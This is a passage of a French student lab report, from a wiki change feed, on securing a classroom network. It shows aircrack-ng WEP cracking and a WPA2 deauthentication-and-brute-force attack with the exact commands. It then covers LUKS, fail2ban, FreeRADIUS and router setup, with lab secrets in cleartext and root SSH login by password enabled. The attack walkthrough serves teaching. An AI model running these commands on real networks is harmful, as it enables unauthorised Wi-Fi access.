    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^\S+ named\[\d+\]: client &amp;lt;HOST&amp;gt;#\S+ .* query .* denied&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client cisco_ap_salhi {&lt;br /&gt;
    ipaddr = 10.60.15.0/24&lt;br /&gt;
    secret = radius_secret_salhi_2026&lt;br /&gt;
    shortname = cisco-ap&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    Reply-Message = &amp;quot;Bienvenue sur le WiFi SE4 - Mohamed Salhi&amp;quot;&lt;br /&gt;
    Tunnel-Type = VLAN,&lt;br /&gt;
    Tunnel-Medium-Type = IEEE-802,&lt;br /&gt;
    Tunnel-Private-Group-Id = 25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur '''E306''' (plage 151‑200), configuration similaire avec une plage différente.&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12403</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12403"/>
		<updated>2026-02-25T19:08:33Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Configuration chez le registrar Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
